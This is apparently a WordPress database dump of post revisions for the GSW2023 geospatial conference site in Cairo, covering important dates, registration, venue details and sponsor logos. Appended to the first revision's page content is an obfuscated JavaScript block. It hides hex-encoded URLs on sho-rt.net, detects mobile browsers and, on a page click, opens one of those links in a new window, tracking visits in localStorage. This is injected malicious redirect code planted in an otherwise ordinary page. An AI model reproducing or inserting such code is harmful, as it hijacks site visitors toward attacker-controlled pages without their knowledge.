border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-18 03:18:02','2023-05-18 03:18:02','',3066,'https://gsw2023.com/?p=4556',0,'revision','',0),
(4557,1,'2023-05-18 03:18:49','2023-05-18 03:18:49','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" 